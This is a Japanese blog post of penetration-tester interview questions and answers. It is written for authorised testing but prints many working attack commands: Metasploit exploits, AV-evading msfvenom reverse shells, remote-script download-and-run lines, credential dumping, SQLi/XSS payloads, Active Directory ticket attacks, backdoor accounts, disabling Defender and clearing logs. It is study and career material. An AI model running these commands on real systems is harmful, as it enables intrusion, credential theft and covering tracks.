12月 21, 2025
39 分で読める

ペネトレーションテスター面接質問と回答

interview
career-advice
job-search
ペネトレーションテスター面接質問と回答
Milad Bonakdar

Milad Bonakdar

著者

スコープ設定、偵察、脆弱性の優先順位付け、Burp Suite、Metasploit、API、Active Directory、レポート作成を問う実践的な面接質問で準備しましょう。

はじめに

ペネトレーションテスター面接で強い回答とは、合意されたスコープ内で作業できること、体系的にテストできること、リスクを開発チームや事業側が行動できる形で説明できることを示す回答です。

この質問集では、スコープ設定、偵察、脆弱性の優先順位付け、Burp Suite、Metasploit、APIテスト、Active Directory、レポート作成を実践的に確認します。回答は常に、許可されたテスト、明確な証拠、修正提案に基づけましょう。

ペネトレーションテストの基礎

1. ペネトレーションテストのフェーズは何ですか?

回答: 優れた方法論は、スキャンの前から始まります。まず書面での許可、スコープ、ルール、テスト時間帯、データ取り扱い制限、緊急連絡先を確認します。その後、再現可能な流れで進めます。

1. スコープ設定と計画:

  • 書面での許可、対象、除外範囲、ルールを確認する
  • 目的、成功基準、連絡方法、中止条件を定義する

2. 偵察と発見:

  • 受動的および能動的に情報を収集する
  • ホスト、サービス、アプリケーションフロー、ユーザーロール、露出した攻撃面を特定する

3. 脆弱性分析:

  • 発見事項をビジネス影響と悪用可能性に結びつける
  • スキャナー結果を発見事項にする前に手動で検証する

4. エクスプロイトとポストエクスプロイト:

  • 影響を証明するために必要な範囲内の弱点だけを悪用する
  • ルールを超えずに権限境界、横展開経路、データ露出を確認する

5. レポート、クリーンアップ、再テスト:

  • 証拠、影響、再現手順、修正策を文書化する
  • テストの痕跡を削除し、関係者に説明し、依頼があれば修正を再テストする
Loading diagram...

偵察の例:

# 受動的な偵察
whois target.com
nslookup target.com
dig target.com ANY

# 能動的な偵察
nmap -sn 192.168.1.0/24  # ホストの発見
nmap -sV -sC target.com  # サービス/バージョンの検出

**頻度:**非常に一般的 **難易度:**中

脆弱性評価

2. 脆弱性の優先順位付けはどのように行いますか?

回答: CVSSを出発点にし、悪用可能性、資産の重要度、データの機密性、公開範囲、補完的な対策、既知の悪用状況で調整します。面接では、すべてのスキャナー結果を同じ緊急度として扱わない判断力が重要です。

CVSSスコアリング:

  • **クリティカル(9.0-10.0):**リモートコード実行、認証バイパス
  • **高(7.0-8.9):**SQLインジェクション、データアクセスを伴うXSS
  • **中(4.0-6.9):**情報漏えい、CSRF
  • **低(0.1-3.9):**軽微な情報漏えい

優先順位付けの要素:

def calculate_risk_score(vulnerability):
    """脆弱性のリスクスコアを計算する"""
    # 基本的なCVSSスコア
    cvss_score = vulnerability.cvss_score
    
    # 悪用可能性
    if vulnerability.exploit_available:
        exploitability = 1.5
    elif vulnerability.poc_available:
        exploitability = 1.2
    else:
        exploitability = 1.0
    
    # アセットの重要度
    asset_value = {
        'critical': 3.0,  # 本番データベース
        'high': 2.0,      # Webアプリケーション
        'medium': 1.5,    # 内部ツール
        'low': 1.0        # テスト環境
    }[vulnerability.asset_criticality]
    
    # データの機密性
    data_sensitivity = {
        'pii': 2.0,       # 個人データ
        'financial': 2.5, # 支払い情報
        'confidential': 1.5,
        'public': 1.0
    }[vulnerability.data_type]
    
    risk_score = cvss_score * exploitability * asset_value * data_sensitivity
    return min(risk_score, 10.0)  # 上限は10

**頻度:**非常に一般的 **難易度:**中

Metasploit

3. Metasploitを使用して脆弱性を悪用するにはどうすればよいですか?

回答: Metasploit Frameworkのワークフロー:

基本的なエクスプロイト:

# Metasploitを開始する
msfconsole

# エクスプロイトを検索する
search ms17-010  # EternalBlue

# エクスプロイトを使用する
use exploit/windows/smb/ms17_010_eternalblue

# オプションを表示する
show options

# ターゲットを設定する
set RHOSTS 192.168.1.100

# ペイロードを設定する
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444

# ターゲットが脆弱かどうかを確認する
check

# エクスプロイトを実行する
exploit

Meterpreterコマンド:

# システム情報
sysinfo
getuid

# 権限昇格
getsystem

# クレデンシャルをダンプする
hashdump
load kiwi
cred_all

# 永続化
run persistence -X -i 60 -p 4444 -r 192.168.1.50

# ピボット
run autoroute -s 10.0.0.0/24
portfwd add -l 3389 -p 3389 -r 10.0.0.10

ペイロードの生成:

# リバースシェルを生成する
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.50 LPORT=4444 \
  -f exe -o payload.exe

# AVを回避するためにエンコードする
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.50 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 \
  -f exe -o encoded_payload.exe

**頻度:**非常に一般的 **難易度:**中~高

4. 権限昇格はどのように実行しますか?

回答: 権限昇格は、誤った構成を悪用して、より高いアクセスレベルを獲得します。

Linux権限昇格:

1. 列挙:

# システム情報
uname -a
cat /etc/issue
cat /etc/*-release

# 現在のユーザーと権限
id
sudo -l

# ユーザーとグループ
cat /etc/passwd
cat /etc/group

# SUIDバイナリ
find / -perm -4000 -type f 2>/dev/null

# 書き込み可能なディレクトリ
find / -writable -type d 2>/dev/null

# Cronジョブ
crontab -l
cat /etc/crontab
ls -la /etc/cron*

# ネットワーク接続
netstat -antup
ss -tulpn

2. 一般的な手法:

SUIDエクスプロイト:

# SUIDバイナリを見つける
find / -perm -u=s -type f 2>/dev/null

# 例:findの悪用
find /home -exec /bin/sh \; -quit

# 例:vimの悪用
vim -c ':!/bin/sh'

# 例:nmapの悪用(古いバージョン)
nmap --interactive
nmap> !sh

Sudoの誤った構成:

# sudoの権限を確認する
sudo -l

# 出力例:
# (ALL) NOPASSWD: /usr/bin/vim

# vimを悪用する
sudo vim -c ':!/bin/sh'

# 例:LD_PRELOAD
sudo LD_PRELOAD=/tmp/shell.so find

カーネルエクスプロイト:

# カーネルバージョンを確認する
uname -r

# エクスプロイトを検索する
searchsploit linux kernel 4.4.0

# 例:Dirty COW
gcc -pthread dirty.c -o dirty -lcrypt
./dirty password

3. 自動化されたツール:

# LinPEAS(Linux Privilege Escalation Awesome Script)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

# Linux Exploit Suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Windows権限昇格:

1. 列挙:

# システム情報
systeminfo
hostname
whoami /all

# ユーザーとグループ
net user
net localgroup administrators

# 実行中のプロセス
tasklist /v
wmic process list full

# サービス
sc query
wmic service list brief

# スケジュールされたタスク
schtasks /query /fo LIST /v

# ネットワーク接続
netstat -ano

# インストールされているソフトウェア
wmic product get name,version

2. 一般的な手法:

引用符で囲まれていないサービスパス:

# 引用符で囲まれていないサービスパスを見つける
wmic service get name,pathname,displayname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# エクスプロイト
C:\Program Files\Vulnerable App\service.exe
# 悪意のある実行可能ファイルを作成する:
C:\Program.exe

AlwaysInstallElevated:

# レジストリを確認する
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# 両方が1の場合、悪意のあるMSIを作成する
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o shell.msi
msiexec /quiet /qn /i shell.msi

トークン偽装:

# Meterpreter
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

3. 自動化されたツール:

# WinPEAS
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')
Invoke-WinPEAS

# PowerUp
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-AllChecks

# Sherlock(カーネルエクスプロイト)
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
Find-AllVulns

**頻度:**非常に一般的 **難易度:**高

Burp Suite

5. Burp Suiteを使用してSQLインジェクションを見つけるにはどうすればよいですか?

回答: 体系的なSQLインジェクションテスト:

1. リクエストをインターセプトする:

POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

username=admin&password=test123

2. Repeaterに送信する: 手動ペイロードをテストする:

username=admin' OR '1'='1&password=test
username=admin' AND 1=1--&password=test
username=admin' UNION SELECT NULL--&password=test

3. Intruderを使用する:

攻撃タイプ:スナイパー
ペイロード位置:username=§admin§
ペイロードリスト:
  ' OR '1'='1
  ' OR 1=1--
  ' UNION SELECT NULL--
  ' UNION SELECT NULL,NULL--
  admin'--
  ' OR 'a'='a

4. レスポンスを分析する:

  • レスポンスの長さが異なる
  • エラーメッセージ
  • 時間遅延(ブラインドSQLi)

高度なテスト:

# ブラインドSQLインジェクションの検出
import requests
import time

def test_blind_sqli(url, param):
    # 時間ベースの検出
    payloads = [
        "' AND SLEEP(5)--",
        "' OR SLEEP(5)--",
        "'; WAITFOR DELAY '00:00:05'--"
    ]
    
    for payload in payloads:
        start = time.time()
        response = requests.post(url, data={param: payload})
        elapsed = time.time() - start
        
        if elapsed > 5:
            print(f"[+] ブラインドSQLiが次のペイロードで見つかりました:{payload}")
            return True
    
    return False

**頻度:**非常に一般的 **難易度:**中

Webアプリケーションテスト

6. XSS脆弱性をテストするにはどうすればよいですか?

回答: 包括的なXSSテストアプローチ:

XSSのタイプ:

  1. **リフレクテッド:**URL/フォームのペイロードが即座に反映される
  2. **ストアード:**ペイロードがデータベースに保存される
  3. **DOMベース:**クライアント側のJavaScriptの脆弱性

テスト方法論:

1. インジェクションポイントを特定する:

# URLパラメータ
http://target.com/search?q=<script>alert(1)</script>

# フォーム入力
<input name="comment" value="<script>alert(1)</script>">

# HTTPヘッダー
User-Agent: <script>alert(1)</script>

2. フィルタをバイパスする:

// 基本的なペイロード
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

// フィルタをバイパスする
<scr<script>ipt>alert(1)</script>
<img src=x onerror="alert(1)">
<IMG SRC=x ONERROR=alert(1)>  // 大文字と小文字の区別

// イベントハンドラー
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>

// エンコードされたペイロード
&#60;script&#62;alert(1)&#60;/script&#62;
\u003cscript\u003ealert(1)\u003c/script\u003e

3. Burp Suite XSSテスト:

Intruderペイロードリスト:
  <script>alert(document.domain)</script>
  <img src=x onerror=alert(1)>
  <svg/onload=alert(1)>
  javascript:alert(1)
  <iframe src="javascript:alert(1)">

4. 自動スキャン:

# XSStrike
python xsstrike.py -u "http://target.com/search?q=test"

# Dalfox
dalfox url http://target.com/search?q=FUZZ

**頻度:**非常に一般的 **難易度:**中

7. APIセキュリティをテストするにはどうすればよいですか?

回答: APIセキュリティテストは、認証、認可、および入力検証に焦点を当てています。

一般的なAPIの脆弱性:

1. 認証の不備:

# 脆弱なJWTをテストする
curl -H "Authorization: Bearer eyJhbGciOiJub25lIn0..." https://api.example.com/user

# "alg": "none"のJWT
# ペイロードを変更し、署名を削除する

2. 認可の不備:

# IDOR(Insecure Direct Object Reference)
curl https://api.example.com/user/123
curl https://api.example.com/user/124  # 他のユーザーIDを試す

# 異なるHTTPメソッドをテストする
curl -X DELETE https://api.example.com/user/123
curl -X PUT https://api.example.com/user/123 -d '{"role":"admin"}'

3. 大量割り当て:

# 管理者フィールドを追加してみる
curl -X POST https://api.example.com/register \
  -H "Content-Type: application/json" \
  -d '{
    "username": "attacker",
    "password": "pass123",
    "role": "admin",
    "is_admin": true
  }'

REST APIテスト:

# 自動化されたAPIテスト
import requests
import json

class APISecurityTester:
    def __init__(self, base_url, token=None):
        self.base_url = base_url
        self.headers = {}
        if token:
            self.headers['Authorization'] = f'Bearer {token}'
    
    def test_idor(self, endpoint, id_range):
        """IDOR脆弱性をテストする"""
        accessible_ids = []
        
        for user_id in range(id_range[0], id_range[1]):
            url = f"{self.base_url}/{endpoint}/{user_id}"
            response = requests.get(url, headers=self.headers)
            
            if response.status_code == 200:
                accessible_ids.append(user_id)
                print(f"[+] アクセス可能:{user_id}")
        
        return accessible_ids
    
    def test_rate_limiting(self, endpoint):
        """レート制限をテストする"""
        for i in range(1000):
            response = requests.get(
                f"{self.base_url}/{endpoint}",
                headers=self.headers
            )
            
            if response.status_code == 429:
                print(f"[+] {i}リクエスト後にレート制限が適用されました")
                return True
        
        print("[-] レート制限は検出されませんでした")
        return False
    
    def test_injection(self, endpoint, payloads):
        """インジェクション脆弱性をテストする"""
        for payload in payloads:
            data = {"search": payload}
            response = requests.post(
                f"{self.base_url}/{endpoint}",
                headers=self.headers,
                json=data
            )
            
            # SQLエラーを確認する
            if any(err in response.text.lower() for err in 
                   ['sql', 'mysql', 'sqlite', 'postgresql', 'oracle']):
                print(f"[!] 潜在的なSQLインジェクション:{payload}")
                print(f"レスポンス:{response.text[:200]}")
    
    def test_authentication_bypass(self, login_endpoint):
        """認証バイパスをテストする"""
        bypass_payloads = [
            {"username": "admin' OR '1'='1", "password": "anything"},
            {"username": "admin", "password": "' OR '1'='1"},
            {"username": "admin'--", "password": ""},
        ]
        
        for payload in bypass_payloads:
            response = requests.post(
                f"{self.base_url}/{login_endpoint}",
                json=payload
            )
            
            if response.status_code == 200:
                print(f"[!] 潜在的な認証バイパス:{payload}")

# 使用例
tester = APISecurityTester('https://api.example.com')
tester.test_idor('users', (1, 100))
tester.test_rate_limiting('api/search')

GraphQLテスト:

# イントロスペクションクエリ
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      name
      fields {
        name
        args {
          name
          type { name }
        }
      }
    }
  }
}
# GraphQLインジェクション
query = '''
query {
  user(id: "1' OR '1'='1") {
    id
    username
    email
  }
}
'''

# GraphQLバッチ処理攻撃
queries = [
    {"query": "query { user(id: 1) { id username } }"},
    {"query": "query { user(id: 2) { id username } }"},
    # ... 1000回繰り返す
]

response = requests.post(
    'https://api.example.com/graphql',
    json=queries
)

APIファジング:

# ffufを使用したAPIファジング
ffuf -w wordlist.txt -u https://api.example.com/FUZZ -mc 200,301,302

# パラメータファジング
ffuf -w params.txt -u https://api.example.com/api?FUZZ=test -mc 200

# メソッドファジング
for method in GET POST PUT DELETE PATCH OPTIONS; do
    curl -X $method https://api.example.com/api/resource
done

Postman/Burp Suite:

// Postmanプリリクエストスクリプト
const payload = "' OR '1'='1";
pm.environment.set("injection_payload", payload);

// Postmanテストスクリプト
pm.test("SQLエラーの確認", function () {
    pm.expect(pm.response.text()).to.not.include("SQL");
    pm.expect(pm.response.text()).to.not.include("mysql");
});

OWASP APIセキュリティトップ10:

  1. オブジェクトレベルの認可の不備 - IDORをテストする
  2. 認証の不備 - 脆弱なトークンをテストする
  3. 過剰なデータ公開 - レスポンスデータを確認する
  4. リソースとレート制限の欠如 - DoSをテストする
  5. 機能レベルの認可の不備 - 権限昇格をテストする
  6. 大量割り当て - パラメータ汚染をテストする
  7. セキュリティの誤った構成 - ヘッダー、CORSを確認する
  8. インジェクション - SQLi、NoSQLi、コマンドインジェクションをテストする
  9. 不適切なアセット管理 - 古いAPIバージョンを見つける
  10. 不十分なロギングと監視 - 監査ログを確認する

**頻度:**一般的 **難易度:**中~高

ネットワークペネトレーションテスト

8. ネットワークペネトレーションテストはどのように実行しますか?

回答: 構造化されたネットワーク評価:

1. ネットワークディスカバリー:

# Pingスイープ
nmap -sn 192.168.1.0/24

# ARPスキャン(ローカルネットワーク)
arp-scan -l

# アクティブなホストを特定する
netdiscover -r 192.168.1.0/24

2. ポートスキャン:

# TCP SYNスキャン(ステルス)
nmap -sS 192.168.1.100

# サービスバージョンの検出
nmap -sV 192.168.1.100

# OSの検出
nmap -O 192.168.1.100

# アグレッシブスキャン
nmap -A -T4 192.168.1.100

# すべてのポート
nmap -p- 192.168.1.100

3. 脆弱性スキャン:

# Nmap NSEスクリプト
nmap --script vuln 192.168.1.100

# 特定の脆弱性
nmap --script smb-vuln-ms17-010 192.168.1.100

# 包括的なスキャンにはOpenVAS/Nessusを使用する

4. エクスプロイト:

# SMBエクスプロイト
use exploit/windows/smb/ms17_010_eternalblue

# SSHブルートフォース
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USERNAME root
set PASS_FILE /usr/share/wordlists/rockyou.txt
run

5. ポストエクスプロイト:

# 水平展開
# クレデンシャルのダンプ
# 権限昇格
# 永続化

**頻度:**非常に一般的 **難易度:**高

9. Active Directory環境を攻撃するにはどうすればよいですか?

回答: Active Directoryは、多くのアタックベクターを持つ主要なターゲットです。

列挙:

# PowerView列挙
Import-Module PowerView.ps1

# ドメイン情報を取得する
Get-Domain
Get-DomainController

# ユーザーを列挙する
Get-DomainUser
Get-DomainUser -Identity administrator

# グループを列挙する
Get-DomainGroup
Get-DomainGroupMember -Identity "Domain Admins"

# 共有を見つける
Find-DomainShare -CheckShareAccess

# コンピュータを見つける
Get-DomainComputer

BloodHound:

# SharpHoundでデータを収集する
.\SharpHound.exe -c All

# またはPowerShellを使用する
Import-Module SharpHound.ps1
Invoke-BloodHound -CollectionMethod All

# BloodHound GUIにJSONをアップロードする
# Domain Adminsへの攻撃パスを分析する

Kerberoasting:

# サービ​​スチケットをリクエストする
Import-Module Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat

# またはRubeusを使用する
.\Rubeus.exe kerberoast /outfile:hashes.txt

# hashcatでクラックする
hashcat -m 13100 hashes.txt wordlist.txt

AS-REP Roasting:

# 「Kerberos事前認証を必要としない」ユーザーを見つける
Get-DomainUser -PreauthNotRequired

# AS-REPをリクエストする
.\Rubeus.exe asreproast /outfile:asrep_hashes.txt

# クラックする
hashcat -m 18200 asrep_hashes.txt wordlist.txt

Pass-the-Hash:

# Impacketを使用する
python3 psexec.py -hashes :ntlmhash [email protected]

# CrackMapExecを使用する
crackmapexec smb 10.10.10.0/24 -u administrator -H ntlmhash

# SAMをダンプする
python3 secretsdump.py -hashes :ntlmhash [email protected]

Pass-the-Ticket:

# Mimikatzでチケットをエクスポートする
mimikatz # sekurlsa::tickets /export

# チケットをインジェクトする
mimikatz # kerberos::ptt ticket.kirbi

# またはRubeusを使用する
.\Rubeus.exe ptt /ticket:ticket.kirbi

Golden Ticket:

# krbtgtハッシュを取得する
mimikatz # lsadump::dcsync /domain:example.com /user:krbtgt

# ゴールデンチケットを作成する
mimikatz # kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-... /krbtgt:hash /id:500

# チケットをインジェクトする
mimikatz # kerberos::ptt ticket.kirbi

Silver Ticket:

# サービスアカウントハッシュを取得する
mimikatz # sekurlsa::logonpasswords

# 特定のサービスのシルバーチケットを作成する
mimikatz # kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-... /target:server.example.com /service:cifs /rc4:hash

DCSync攻撃:

# Mimikatz
mimikatz # lsadump::dcsync /domain:example.com /user:Administrator

# Impacket
python3 secretsdump.py example.com/user:[email protected]

水平展開:

# PSExec
.\PsExec.exe \\target -u domain\user -p password cmd

# WMI
wmic /node:target /user:domain\user /password:password process call create "cmd.exe"

# PowerShellリモート処理
Enter-PSSession -ComputerName target -Credential domain\user

# RDP
xfreerdp /u:domain\user /p:password /v:target

永続化:

# ドメイン管理者を作成する
net user backdoor Password123! /add /domain
net group "Domain Admins" backdoor /add /domain

# ゴールデンチケット(長期)
# シルバーチケット(特定のサービス)

# スケルトンキー(Mimikatz)
mimikatz # misc::skeleton
# これで、すべてのユーザーがパスワード「mimikatz」で認証できます

防御回避:

# Windows Defenderを無効にする
Set-MpPreference -DisableRealtimeMonitoring $true

# イベントログをクリアする
wevtutil cl System
wevtutil cl Security
wevtutil cl Application

# PowerShellを難読化する
Invoke-Obfuscation

**頻度:**一般的 **難易度:**高

レポート

10. ペネトレーションテストレポートには何を含める必要がありますか?

回答: 包括的なレポート構造:

エグゼクティブサマリー:

  • 高レベルの調査結果
  • ビジネスへの影響
  • リスクの概要
  • 推奨事項

技術的な詳細:

発見事項の例:ログインフォームのSQLインジェクション

**重要度:**クリティカル(CVSS 9.8)

説明: /admin/loginのログインフォームにはSQLインジェクションの脆弱性があり、 攻撃者が認証をバイパスして管理パネルにアクセスできるようになります。

影響を受けるアセット:

概念実証:

POST /admin/login HTTP/1.1
Host: target.com

username=admin' OR '1'='1'--&password=anything

影響:

  • 管理パネルへの不正アクセス
  • 機密顧客データへのアクセス
  • 潜在的なデータベース侵害

修正:

  1. パラメータ化されたクエリを使用する
  2. 入力検証を実装する
  3. 最小特権の原則をデータベースユーザーに適用する

**頻度:**非常に一般的 **難易度:**中

結論

ペネトレーションテスターの面接には、実践的な経験と深い技術的知識が必要です。以下に焦点を当ててください。

  1. **方法論:**構造化されたテストアプローチ、ドキュメント
  2. **脆弱性評価:**リスクの優先順位付け、CVSSスコアリング
  3. **ツール:**Metasploit、Burp Suite、Nmap、カスタムスクリプト
  4. **権限昇格:**LinuxおよびWindowsのテクニック、自動化ツール
  5. **Webテスト:**SQLインジェクション、XSS、認証バイパス
  6. **APIテスト:**REST/GraphQLセキュリティ、認可の欠陥
  7. **ネットワークテスト:**スキャン、エクスプロイト、水平展開
  8. **Active Directory:**Kerberoasting、Pass-the-Hash、BloodHound
  9. **レポート:**明確なドキュメント、ビジネスへの影響、修正

合法的なラボや意図的に脆弱に作られたアプリケーションで練習し、再現可能なテストチェックリストを作り、エクスプロイトと同じくらい発見事項の書き方も練習しましょう。優れた候補者は、いつ止めるか、どう安全に影響を証明するか、どう修正を支援するかを説明できます。

Newsletter subscription

実際に機能する週次のキャリアのヒント

最新の洞察をメールボックスに直接お届けします

関連投稿

Node.jsシニアバックエンド面接質問集
12月 21, 2025
21 分で読める

Node.jsシニアバックエンド面接質問集

Event Loop、Streams、APIセキュリティ、システム設計、スケーリング、パフォーマンス、テスト、本番運用責任を扱う30問で、Node.jsシニアバックエンド面接に備えましょう。

Milad BonakdarMilad Bonakdar
Pythonシニアバックエンド開発者の面接質問
12月 21, 2025
28 分で読める

Pythonシニアバックエンド開発者の面接質問

Pythonの内部構造、並行処理、システム設計、データベース、API、セキュリティ、本番運用のトレードオフを問うシニア向け面接対策です。

Milad BonakdarMilad Bonakdar
Goバックエンド開発者の面接質問:実践ガイド
12月 21, 2025
18 分で読める

Goバックエンド開発者の面接質問:実践ガイド

Goバックエンド面接に向けて、goroutine、channel、context、エラー処理、テスト、HTTPサーバー、システム設計の質問を実践的に確認します。

Milad BonakdarMilad Bonakdar

採用担当者に目立ち、夢の仕事を手に入れよう

ATSを通過し、採用担当者を感動させるAI搭載の履歴書でキャリアを変えた数千人の仲間に加わりましょう。

今すぐ作成を開始

この投稿を共有

75%のATS不採用率を克服

4件中3件の履歴書は人の目に触れることがありません。当社のキーワード最適化により通過率が最大80%向上し、採用担当者に確実にあなたの可能性を見てもらえます。

今すぐATS最適化